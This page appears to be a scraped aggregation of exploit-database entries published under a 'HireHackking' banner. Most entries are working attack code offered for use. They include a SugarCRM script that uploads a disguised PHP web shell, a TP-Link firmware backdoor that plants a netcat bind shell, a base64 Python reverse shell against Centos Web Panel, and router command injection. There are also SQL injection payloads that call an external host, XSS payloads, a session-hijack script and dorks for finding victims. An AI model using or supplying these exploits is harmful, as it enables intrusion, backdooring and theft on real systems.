# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE) # Exploit Author: Chan Nyein Wai & Thura Moe Myint # Vendor Homepage: https://www.manageengine.com/products/ad-manager/ # Software Link: https://www.manageengine.com/products/ad-manager/download.html # Version: Ad Manager Plus Before 7122 # Tested on: Windows # CVE : CVE-2021-44228 # Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md ### Description In the summer of 2022, I have been doing security engagement on Synack Red Team in the collaboration with my good friend (Thura Moe Myint). At that time, Log4j was already widespread on the internet. Manage Engine had already patched the Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that the Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability. ### Exploitation First, Let’s make a login request using proxy. Inject the following payload in the ```methodToCall``` parameter in the ```ADSearch.cc``` request. Then you will get the dns callback with username in your burp collabrator. ### Notes When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time , we eventually managed to bypass the firewall and anti-virus, and achieve full RCE. ### Conclusion We had already informed Zoho about the log4j vulnerability, and even after it was fixed, they decided to reward us with a bonus bounty for our report. ### Mitigation Updating to a version of Ad Manager Plus higher than 7122 should resolve the issue.
HireHackking

XCMS v1.83 - Remote Command Execution (RCE)

HACKER · %s · %s

Exploit Title: XCMS v1.83 - Remote Command Execution (RCE) Author: Onurcan Email: onurcanalcan@gmail.com Site: ihteam.net Script Download : http://www.xcms.it Date: 26/12/2022 The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms. Taking "home.php" for example: <?php //home.php [...] include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb" ?> So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel. So let's take a look to the bugged code. <?php //cpie.php [...] if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D [...] if(isset($_POST['salva'])){ Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control } [...] ?> So with a simple html form we can change the footer. Ex: <form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post"> <input type="hidden" name="salva" value="OK" /> <textarea name="testo_0"><?php YOUR PHP CODE ?></textarea> <input type="submit" value="Modifica" /> </form> <script>document.editor.submit()</script> Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials. Trick: We can change the admin panel password by inserting this code in the footer: <?php $pwd = "owned"; // <- Place here your new password. $pwd2 = md5($pwd); unlink("dati/generali/pass.php"); $f = fopen("dati/generali/pass.php",w); fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>"); fclose($f); ?> This code delete the old password file and then create a new one with your new password. Fix: <?php //cpie.php [...] if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug. [...] if(isset($_POST['salva'])){ Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control } [...] ?> So this is a simple exploit: <?php if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){ echo " <form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\"> <input type=\"hidden\" name=\"salva\" value=\"OK\" /> <textarea name=\"testo_0\">".$_POST['code']."</textarea> <input type=\"submit\" value=\"Modifica\" /> </form> <script>document.editor.submit()</script>"; }else{ echo" <pre> XCMS <= v1.82 Remote Command Execution Vulnerability Dork : inurl:\"mod=notizie\" by Onurcan Visit ihteam.net </pre> <form method=POST action=".$_POST['PHP_SELF']."> <pre> Site : <input type=text name=site /> Code : <textarea name=code cols=49 rows=14>Your code here</textarea> <input type=submit value=Exploit /> <input type=hidden name=\"send\" /> </pre> </form>"; } ?>
HireHackking

SugarCRM 12.2.0 - Remote Code Execution (RCE)

HACKER · %s · %s

#!/usr/bin/env python # Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE) # Exploit Author: sw33t.0day # Vendor Homepage: https://www.sugarcrm.com # Version: all commercial versions up to 12.2.0 # Dorks: # https://www.google.com/search?q=site:sugarondemand.com&filter=0 # https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php # https://www.shodan.io/search?query=http.title:"SugarCRM" # https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM" # https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com" import base64, re, requests, sys, uuid requests.packages.urllib3.disable_warnings() if len(sys.argv) != 2: sys.exit("Usage: %s [URL]" % sys.argv[0]) print "[+] Sending authentication request" url = sys.argv[1] + "/index.php" session = {"PHPSESSID": str(uuid.uuid4())} params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1} requests.post(url, cookies=session, data=params, verify=False) print "[+] Uploading PHP shell\n" png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC" upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml params = {"module": "EmailTemplates", "action": "AttachFiles"} requests.post(url, cookies=session, data=params, files=upload, verify=False) url = sys.argv[1] + "/cache/images/sweet.phar" while True: cmd = raw_input("# ") res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False) res = re.search("#####(.*)#####", res.text, re.DOTALL) if res: print res.group(1) else: sys.exit("\n[+] Failure!\n")
HireHackking

Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion

HACKER · %s · %s

Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion Vendor: Hughes Network Systems, LLC Product web page: https://www.hughes.com Affected version: HX200 v8.3.1.14 HX90 v6.11.0.5 HX50L v6.10.0.18 HN9460 v8.2.0.48 HN7000S v6.9.0.37 Summary: The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The HX200 satellite router provides flexible Quality of Service (QoS) features that can be tailored to the network applications at each individual remote router, such as Adaptive Constant Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, and DNS Server/Relay functionality, together with a high-performance satellite modem, the HX200 is a full-featured IP Router with an integrated high-performance satellite router. The HX200 enables high- performance IP connectivity for a variety of applications including cellular backhaul, MPLS extension services, virtual leased line, mobile services and other high-bandwidth solutions. Desc: The router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application. Tested on: WindWeb/1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5743 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php 23.12.2022 -- snippet:///XFSRFI // // Hughes Satellite Router RFI/XFS PoC Exploit // by lqwrm 2022 // //URL http://TARGET/fs/dynaform/speedtest.html //Reload target //window.location.reload() console.log("Loading Broadband Satellite Browsing Test"); //Add cross-frame file include (http only) AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg"); console.log("Calling StartTest()"); StartTest() //console.log("Calling DoTest()"); //DoTest() //Unload weapon //document.getElementById("URLList").remove();
HireHackking
# !/usr/bin/python3 # Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Tobias Müller # Date: 2022-12-01 # Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329 # Vendor Homepage: https://www.tp-link.com/ # Tested On: TP-Link TL-WR902AC # Vulnerability Description: Remote Code Execution via importing malicious firmware file # CVE: CVE-2022-48194 # Technical Details: https://github.com/otsmr/internet-of-vulnerable-things TARGET_HOST = "192.168.0.1" ADMIN_PASSWORD = "admin" TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip" import requests import os import glob import subprocess import base64, os, hashlib from Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome from Crypto.PublicKey import RSA from Crypto.Util.Padding import pad for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]: if "not found" in subprocess.check_output(["which", program]).decode(): print(f"[!] need {program} to run") exit(1) class WebClient(object): def __init__(self, host, password): self.host = "http://" + host self.password = password self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest() self.aes_key = "7765636728821987" self.aes_iv = "8775677306058909" self.session = requests.Session() crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16) self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16) self.seq = int(crypto_data.split("\n")[3].split('"')[1]) self.jsessionid = self.get_jsessionid() def get_jsessionid(self): post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n" self.get_encrypted_request_data(post_data, True) return self.session.cookies["JSESSIONID"] def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8')) plaintext_padded = pad(plaintext, aes_block_size) return cipher.encrypt(plaintext_padded) def rsa_encrypt(self, n, e, plaintext): public_key = RSA.construct((n, e)).publickey() encryptor = PKCS1_v1_5.new(public_key) block_size = int(public_key.n.bit_length() / 8) - 11 encrypted_text = '' for i in range(0, len(plaintext), block_size): encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex() return encrypted_text def get_encrypted_request_data(self, post_data, is_login: bool): encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8')) encrypted_data = base64.b64encode(encrypted_data).decode() self.seq += len(encrypted_data) signature = f"h={self.password_hash}&s={self.seq}" if is_login: signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8')) body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n" return self.cgi_basic("_gdpr", body) def cgi_basic(self, url: str, body: str): res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={ "Referer": "http://192.168.0.1/" }) if res.status_code != 200: print(res.text) raise ValueError("router not reachable") return res def cmd(command): print("[*] running " + command) os.system(command) def build_backdoor(): if os.path.isdir("./tp_tmp"): cmd("rm -r -f ./tp_tmp") os.mkdir("./tp_tmp") os.chdir('./tp_tmp') print("[*] downloading firmware") res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD) with open("firmware.zip", "wb") as f: f.write(res.content) print("[*] downloading netcat") #res = requests.get(NETCAT_PRECOMPILED_FILE) #with open("netcat", "wb") as f: # f.write(res.content) if os.path.isfile("netcat"): print("[!] netcat not found") exit() cmd('unzip firmware.zip') filename = glob.glob("TL-*.bin")[0] cmd(f"mv '{filename}' firmware.bin") cmd('binwalk --dd=".*" firmware.bin') cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200') with open("./squashfs-root/etc/init.d/back", "w") as f: f.write(""" #!/bin/sh while true; do netcat -l -p 3030 -e /bin/sh sleep 5 done """) cmd("chmod +x ./squashfs-root/etc/init.d/back") with open("./squashfs-root/etc/init.d/rcS", "r+") as f: content = f.read() content = content.replace("cos &", "/etc/init.d/back &\ncos &") f.write(content) cmd("cp netcat ./squashfs-root/usr/bin/") cmd("chmod +x ./squashfs-root/usr/bin/netcat") cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144") size = subprocess.check_output(["file", "backdoor.squashfs"]).decode() offset = int(size.split(" ")[9]) + 1442304 cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304") cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304") cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}") os.chdir('../') cmd(f"mv ./tp_tmp/backdoor.bin .") cmd("rm -r -f ./tp_tmp") def upload_backdoor(): wc = WebClient(TARGET_HOST, ADMIN_PASSWORD) print("[*] uploading backdoor") files = { 'filename': open('backdoor.bin','rb') } re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={ "JSESSIONID": wc.jsessionid }, headers={ "Referer": "http://192.168.0.1/mainFrame.htm" }, files=files) if re_upload.status_code != 200 or "OK" not in re_upload.text: print("[!] error") exit(1) print("[*] success!") print("\nWait for router restart, then run:") print("nc 192.168.0.1 3030") build_backdoor() upload_backdoor()
HireHackking
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio= n (RCE) (Authenticated) # Date: 19/10/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://www.nexxtsolutions.com/ # Version: 42.103.1.5095 # Tested on: ARN02304U8 # CVE : CVE-2022-44149 import requests import base64 router_host =3D "http://192.168.1.1" username =3D "admin" password =3D "admin" def main(): send_payload("&telnetd") print("connect to router using: `telnet "+router_host.split("//")[1]+ "= ` using known credentials") pass def gen_header(u, p): return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii") def get_cookie(header): url =3D router_host+"/login" params =3D {"arg":header, "_n":1} resp=3Drequests.get(url, params=3Dparams) =20 def send_payload(payload): url =3D router_host+"/goform/sysTools" headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa= ssword))} params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK= "} requests.post(url, headers=3Dheaders, data=3Dparams) if __name__ =3D=3D '__main__': main()
HireHackking
# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) # Google Dork: N/A # Date: 2/1/2023 # Exploit Author: Rian Saaty # Vendor Homepage: https://yui.github.io/yui2/ # Software Link: https://yui.github.io/yui2/ # Version: 2.8.2 # Tested on: MacOS, WindowsOS, LinuxOS # CVE : CVE-2022-48197 The YUI2 has a lot of reflected XSS vulnerabilities in pretty much most files. A sample of the vulnerable files along with the exploit can be found here: https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E Twitter: @Ryan_412_
HireHackking

ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS) # Date: 12/09/2022 # Exploit Author: Rob, CTRL Group # Vendor Homepage: marigroup.com # Version: V3.3.3 and under # Tested on: Windows IIS all versions # CVE : CVE-2022-35543 “Stored Cross-Site Scripting” Vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert. Login to the appplication Browse to "Settings" tab and tehn " Wards". Create a new word with the following payload at the ward name: <script>alert(document.cookie)</script> Any user browsing the application will trigger the payload.
HireHackking

ChiKoi v1.0 - SQL Injection

HACKER · %s · %s

## Title: ChiKoi-1.0 SQLi ## Author: nu11secur1ty ## Date: 01.12.2023 ## Vendor: https://chikoiquan.tanhongit.com/ ## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi ## Description: The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc. ## STATUS: HIGH Vulnerability - CRITICAL [+] Payload: ```MySQL --- Parameter: User-Agent (User-Agent) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- - Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND (SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR --- ``` [+] Online: ```MySQL --- Parameter: User-Agent (User-Agent) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- - --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi) ## Proof and Exploit: [href](https://streamable.com/7x69yz) ## Time spent `01:30:00` ## Writing an exploit `00:05:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking
## Exploit Title: pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute ## Author: nu11secur1ty ## Date: 01.11.2023 ## Vendor: https://pimcore.com/en ## Software: https://packagist.org/packages/pimcore/skeleton ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton ## Description: The pimCore-5.4.18-skeleton suffers from Sensitive Cookie with Improper SameSite Attribute vulnerability - PHPSESSID cookie Session management connection requests are not sanitizing correctly. There are no securing changes in PHPSESSID cookies for every request - validating sessions and changing a cookie for every connection - POST Request. The attacker in the same network can trick the user - the administrator of this system and can steal his cookie, then he can make very evil things by using the same session from the name of the already authenticated user - administrator, on a couple of PCs with different IPs which are used from different machines into that network. When the attacker steals the cookie, he can manipulate the same session, for example, he can log out or do very malicious stuff. This is a very stupid developer's error, and this can be very dangerous for the owner of the system. The attack is possible also in the external network! ## STATUS: HIGH Vulnerability [+] Payload: ```Python #!/usr/bin/python3 # @nu11secur1ty 2023 import time from selenium import webdriver driver = webdriver.Chrome() print("Give the stolen cookie...\n") cookie = input() print("Give the domain or IP of the owner of the cookie...\n") target = input() driver.maximize_window() driver.get(target+ 'admin/?_dc=1673370965&perspective=') driver.add_cookie({'name': 'PHPSESSID', 'value': cookie}) print(driver.get_cookie('PHPSESSID')) driver.get(target+ 'admin/?_dc=1673370965&perspective=') time.sleep(3) print("Press any key to stop the exploit...\n") input() print("Your PHPSESSID is PWNED") ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton) ## Reference: [href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions) ## Proof and Exploit: [href](https://streamable.com/lorw8x) ## Time spent `03:00:00` ## Writing an exploit `00:25:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Splashtop 8.71.12001.0 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path # Date: 12/20/2022 # Exploit Author: A.I. hernandez # Version: 8.71.12001.0 # Vendor Homepage: https://www.splashtop.com # Version: current version # Tested on: Windows 10 21H2 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe Auto C:\>sc qc SSUService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SSUService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Splashtop Software Updater Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
HireHackking

perfSONAR v4.4.5 - Partial Blind CSRF

HACKER · %s · %s

Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF Link: https://github.com/perfsonar/ Affected Versions: v4.x <= v4.4.5 Vulnerability Type: Partial Blind CSRF Discovered by: Ryan Moore CVE: CVE-2022-41413 Summary A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR. This vulnerability was patched in perfSONAR v4.4.6. Proof of Concept Examples Here are two examples of this vulnerability. For further details, review the Technical Overview section below. Example 1: Client browser connects to www.google.com in the background. http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com Example 2: Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint. http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api
HireHackking

Prizm Content Connect v10.5.1030.8315 - XXE

HACKER · %s · %s

# Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE # Date: 21/12/2022 # Exploit Author: @xhzeem # Vendor Homepage: https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html # Version: v10.5.1030.8315 The Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE Proof Of Concept: http://www.example.com/default.aspx?document=file.xml The file.xml can have an OoB XXE payload or any other blind XXE exploit.
HireHackking

Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS) # Exploit Author: Mohammed A.Siledar # Author Company : reprisesoftware # Version: rlm.v14.2BL4 # Vendor home page : https://reprisesoftware.com # Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe # Authentication Required: No # CVE : CVE-2022-30519 # Tested on: Windows 10 # Proof Of Concept: http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E Best Regards.
HireHackking

Apache 2.4.x - Buffer Overflow

HACKER · %s · %s

# Exploit Title: Apache 2.4.x - Buffer Overflow # Date: Jan 2 2023 # Exploit Author: Sunil Iyengar # Vendor Homepage: https://httpd.apache.org/ # Software Link: https://archive.apache.org/dist/httpd/ # Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 # Tested on: (Server) Kali, (Client) MacOS Monterey # CVE : CVE-2021-44790 import requests #Example "http(s)://<hostname>/process.lua" url = "http(s)://<hostname>/<luafile>" payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n" headers = { 'Content-Type': 'multipart/form-data; boundary=4' } #Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1. # But this has to match with the values in Payload. #Note2: The form data as shown above returns the response as "memory allocation error: block too big". # But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows # 3 more bytes during memset response = requests.request("POST", url, headers=headers, data=payload) print(response.text) #Response returned is #<h3>Error!</h3> #<pre>memory allocation error: block too big</pre>
HireHackking
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) [+] Centos Web Panel 7 - < 0.9.8.1147 [+] Affected Component ip:2031/login/index.php?login=$(whoami) [+] Discoverer: Numan Türle @ Gais Cyber Security [+] Author: Numan Türle [+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194 [+] CVE: CVE-2022-44877 Description -------------- Bash commands can be run because double quotes are used to log incorrect entries to the system. Video Proof of Concept -------------- https://www.youtube.com/watch?v=kiLfSvc1SYY Proof of concept: -------------- POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1 Host: 10.13.37.10:2031 Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82 Content-Length: 40 Origin: https://10.13.37.10:2031 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://10.13.37.10:2031/login/index.php?login=failed Accept-Encoding: gzip, deflate Accept-Language: en Connection: close username=root&password=toor&commit=Login -------------- Solution -------- Upgrade to CWP7 current version
HireHackking

AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)

HACKER · %s · %s

